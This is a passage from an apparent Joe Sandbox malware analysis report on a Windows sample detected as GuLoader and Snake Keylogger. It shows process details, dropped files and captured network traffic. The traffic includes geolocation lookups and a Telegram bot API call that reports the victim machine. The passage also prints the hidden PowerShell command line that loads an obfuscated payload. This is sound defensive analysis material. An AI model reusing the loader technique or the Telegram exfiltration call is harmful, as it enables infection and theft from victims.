States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49704	104.21.16.1	443	856	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 21:34:31 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-03-07 21:34:32 UTC	854	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 21:34:32 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cf-Ray: 91cd37aa1e5f638a-ORD Server: cloudflare Age: 144653 Cache-Control: max-age=31536000 Cf-Cache-Status: HIT Last-Modified: Thu, 06 Mar 2025 05:23:38 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oA253OzVmEs5RNXeOX2h3CzQnylTrEYP60dYlreQPeFofoHGIFUOQ3IOy0cbKZ0i6pg92Qv3PV9spCLNvWvlYUm3L%2F6LoueZt0n9KxthV5D%2FqFqYESH5iEe8MwzpBHEarAagTavi"}],"group":"cf-nel","max_age":604800} Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=20190&min_rtt=19329&rtt_var=6930&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=125874&cwnd=194&unsent_bytes=0&cid=55486c6f5b511776&ts=622&x=0"
2025-03-07 21:34:32 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49706	104.21.16.1	443	856	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 21:34:35 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-03-07 21:34:35 UTC	860	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 21:34:35 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 144656 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Thu, 06 Mar 2025 05:23:38 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ppq%2BNTv8bwrM52ooEvv7qDRYonpXm%2FLp%2B1GNJfyguCUg73UQfhzgM6v6GqD80C%2FFAiyY8HZpYzaDItrvCmRXBK8MlLzRL5P9fP4mRPpERcfWp4uroIpcacgUkiVXnpphnMl%2F63zu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cd37bf3a59638a-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=23062&min_rtt=20280&rtt_var=10527&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=90060&cwnd=194&unsent_bytes=0&cid=09d5cada0fbfade6&ts=680&x=0"
2025-03-07 21:34:35 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49708	104.21.16.1	443	856	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 21:34:38 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-03-07 21:34:39 UTC	860	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 21:34:38 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 144660 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Thu, 06 Mar 2025 05:23:38 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9aNdJsmtnsTs%2B6Cp4kEw8vYKFQRirajpr%2BSb85p8thWq3UpVaCHcYI6elqqr53TpX0kn17%2BQtvoYUoHqyvfbi2Z4yMAz%2Bcl4tE0TP0zIUT8Vgy%2BVXYkI8hjf6qzBGIOtYKmD8A0w"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cd37d4cac98114-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=22859&min_rtt=22241&rtt_var=7327&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=116384&cwnd=250&unsent_bytes=0&cid=248935954209eba4&ts=655&x=0"
2025-03-07 21:34:39 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49709	149.154.167.220	443	856	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 21:34:42 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:928100%0D%0ADate%20and%20Time:%2009/03/2025%20/%2001:46:10%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20928100%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-03-07 21:34:42 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 07 Mar 2025 21:34:42 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-03-07 21:34:42 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	16:33:15
Start date:	07/03/2025
Path:	C:\Users\user\Desktop\cqWZtEH4eJ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\cqWZtEH4eJ.exe"
Imagebase:	0x400000
File size:	800'373 bytes
MD5 hash:	218330299346A6935455DFAB57EC8AC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	16:33:16
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -windowstyle hidden "$Formble=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Circumdenudation.Spi';$Riffelkuglens=$Formble.SubString(52868,3);.$Riffelkuglens($Formble) "
Imagebase:	0x2a0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1752763679.0000000009FA4000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:33:16
Start date:	07/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68dae0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	16:33:55
Start date:	07/03/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x3e0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2609054481.0000000022A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report cqWZtEH4eJ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25qgrsze.nuv.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2gxbtpfo.b0u.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m0mso0jq.2m3.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pyrljxmn.2wf.psm1

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Circumdenudation.Spi

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Fanfaren36.Aff

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Fossil.jpg

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Kokkerering\Krukkes.for

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Kokkerering\Levnedsmiddelet.hyd

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Kokkerering\Meir.ini

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Kokkerering\Supratonsillar.ini

C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Kokkerering\asaraceae.txt

Windows Analysis Report
cqWZtEH4eJ.exe